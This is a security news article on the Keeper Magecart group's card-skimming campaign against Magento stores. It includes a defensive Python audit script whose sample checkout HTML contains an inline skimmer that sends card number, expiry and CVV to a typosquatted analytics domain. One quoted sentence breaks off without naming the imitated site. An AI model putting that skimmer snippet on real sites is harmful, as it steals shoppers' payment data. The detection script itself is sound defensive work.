
'Keeper' Group Targeted Payment Card Data on 570 Sites

Hackers Used Magecart-Style Web Skimmers Against Online E-Commerce Sites
How the 'Keeper' hacking group works (Source: Gemini Advisory)

A hacking group known as "Keeper" has been using Magecart-like web skimmers to target the online checkout sites and portals of hundreds of e-commerce sites in order to steal customers' payment card data, according to a report from security firm Gemini Advisory.


Since at least 2017, the Keeper group has targeted approximately 570 online checkout sites, primarily those running the Magento e-commerce platform and belonging to small and midsized e-commerce firms, with estimated losses of about $7 million, according to Gemini.

The researchers note that the majority of the victimized e-commerce sites are located in the U.S., the U.K. and the Netherlands, although the hacking group is suspected of targeting sites in 55 additional countries. And while the majority of the e-commerce sites were small, some were actively generating 500,000 to 1 million visitors each month, the report states.

"The Keeper Magecart group has been active for three years, over which time it has continually improved its technical sophistication and the scale of its operations," the Gemini report notes. "Based on this pattern of successful Magecart attacks, Gemini assesses with high confidence that Keeper is likely to continue launching increasingly sophisticated attacks against online merchants across the world."

Poor Operational Security

The Gemini researchers uncovered the Keeper group's operations when they discovered an unsecured access log that was part of the control panel used to host the stolen payment card data, according to the report.

By examining the unsecured access log, the researchers discovered approximately 184,000 compromised payment card numbers and other data stolen sometime between July 2018 and April 2019. This allowed the researchers to estimate that the hacking group may have compromised some 700,000 payment cards over three years, which would have resulted in losses of up to $7 million.

"Extrapolating the number of cards per nine months to Keeper’s overall lifespan, and given the dark web median price of $10 per compromised Card Not Present card, this group has likely generated upwards of $7 million," the report notes.

Magento Under Attack

The majority of these attacks, about 85%, targeted sites using the Magento e-commerce platform to run their online checkout portals, according to Gemini. Magento, which is owned by Adobe, is a popular platform that e-commerce companies use to build and run their online stores and checkout pages. It's also a frequent target of Magecart-style attacks, the researchers note (see: JavaScript Skimmers Found Hidden in 'Favicon' Icons).

Magento ended support for two earlier versions of its platform - Magento Commerce 1, formerly known as Enterprise Edition, and Magento Open Source 1, formerly known as Community Edition - on June 30, but the Gemini report did not state whether these versions were involved in the attacks. Adobe is recommending users upgrade to the latest versions.

How Keeper Works

The Keeper hackers register malicious domains disguised as legitimate websites, host their JavaScript web skimming payloads on them, and then use the same domains to receive the stolen payment card data, the researchers note. In many cases the attacker domain reused a legitimate site's name under a different top-level domain, so that at a glance it appeared to belong to the legitimate site.

"For example, the attacker domain closetlondon[.]org attempted to imitate," according to the report.

The hacking group is also known to imitate popular website plugins and payment gateways to trick their victims, the researchers add. The researchers say they identified 64 malicious domains and 73 exfiltration domains that the Keeper operators managed as part of their attack infrastructure.

The Keeper group uses these domains to inject malicious JavaScript or web skimming code into an e-commerce firm's online checkout page in order to steal card data, billing information, and additional personally identifiable information, the researchers note. After successfully exfiltrating the data, the hackers then proceed to host the data on the same domain server that the JavaScript lives on.
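As an added example, not code from the Gemini report or from the Keeper operators, here is a small Python audit that lists the hosts a checkout page pulls scripts from or beacons to, and flags those that copy the merchant's name under a different TLD (the closetlondon[.]org pattern described above) or sit one or two characters away from a known third party. The merchant domain, the allowlist and the page HTML are constructed for the demo, and every hostname in it is hypothetical.

```python
"""Added example (not Gemini's or Keeper's code): audit a checkout page for
script and beacon hosts that imitate the merchant's own domain or a known
third party. The merchant host, allowlist and HTML below are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page. The third script tag loads jQuery from the
# merchant's name under a different TLD; the inline script beacons card data
# to a one-character typo of a legitimate analytics host.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="https://cdn.example-shop.com/js/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://example-shop.org/static/jquery.min.js"></script>
<script>
document.forms[0].addEventListener('submit', function () {
  new Image().src = 'https://google-analytlcs.com/collect?d=' +
    btoa(JSON.stringify({n: cc.value, e: exp.value, c: cvv.value}));
});
</script>
</head><body><form action="/checkout"></form></body></html>"""

MERCHANT_HOST = "example-shop.com"                          # hypothetical merchant
ALLOWLIST = {"js.stripe.com", "www.google-analytics.com"}  # hosts the site legitimately loads

URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []          # start buffering an inline script body

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def edit_distance(a, b):
    """Levenshtein distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(host):
    """Second-level label: 'example-shop' for 'cdn.example-shop.com'.
    Simplified; it does not handle multi-part public suffixes such as .co.uk."""
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify_host(host, merchant_host=MERCHANT_HOST, allowlist=ALLOWLIST):
    """own / allowlisted / lookalike-tld / lookalike-typo / unknown."""
    host = host.lower()
    if host == merchant_host or host.endswith("." + merchant_host):
        return "own"
    if host in allowlist:
        return "allowlisted"
    label, own = registrable_label(host), registrable_label(merchant_host)
    if label == own:
        return "lookalike-tld"      # same name, different TLD
    # Typo check only against labels long enough for a distance of 2 to mean something.
    for known in [own] + [registrable_label(a) for a in allowlist]:
        if len(known) >= 6 and edit_distance(label, known) <= 2:
            return "lookalike-typo"
    return "unknown"


def audit_checkout(html, merchant_host=MERCHANT_HOST, allowlist=ALLOWLIST):
    """Map every host referenced by a script tag or inline script to a verdict."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    urls = list(p.external)
    for body in p.inline:
        urls.extend(URL_RE.findall(body))   # beacon / exfiltration targets
    findings = {}
    for url in urls:
        host = urlparse(url).hostname        # relative URLs yield None and are skipped
        if host:
            findings[host] = classify_host(host, merchant_host, allowlist)
    return findings


if __name__ == "__main__":
    for host, verdict in sorted(audit_checkout(SAMPLE_CHECKOUT_HTML).items()):
        print(f"{verdict:15} {host}")
```

Run it against a saved copy of the live checkout page rather than the template in the repository, since the injection happens on the deployed store. A lookalike-tld or lookalike-typo verdict on a script host is the indicator worth acting on: pull that script and diff it against the asset the site is supposed to serve. The audit only sees static HTML and inline script text, not scripts that are fetched at runtime or assembled from obfuscated strings, so pair it with a Content-Security-Policy in report-only mode or a headless-browser capture of the network requests made during a test checkout.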

Targeting E-Commerce

Magecart is the umbrella name for a number of cybercriminal groups that have planted JavaScript skimmers, also known as JavaScript sniffers or JS sniffers, on e-commerce checkout sites and portals over the last several years.

There are about 12 criminal groups that make up Magecart, some dating to 2014, according to security researchers.

One such attack in June saw jewellery and accessories retailer Claire's report that Magecart operators stole its customers' payment card data (see: Claire's: Magecart E-Commerce Hackers Stole Card Data).

Another aspect to Magecart came to light earlier this week when the Dutch security firm Sansec published a report tying the infrastructure used by some Magecart groups to North Korean hackers known as Lazarus or Hidden Cobra, which allegedly have ties to the government (see: North Korean Hacking Infrastructure Tied to Magecart Hits).

About the Author

Akshaya Asokan


Senior Correspondent, ISMG

Asokan is a U.K.-based senior correspondent for Information Security Media Group's global news desk. She previously worked with IDG and other publications, reporting on developments in technology, minority rights and education.
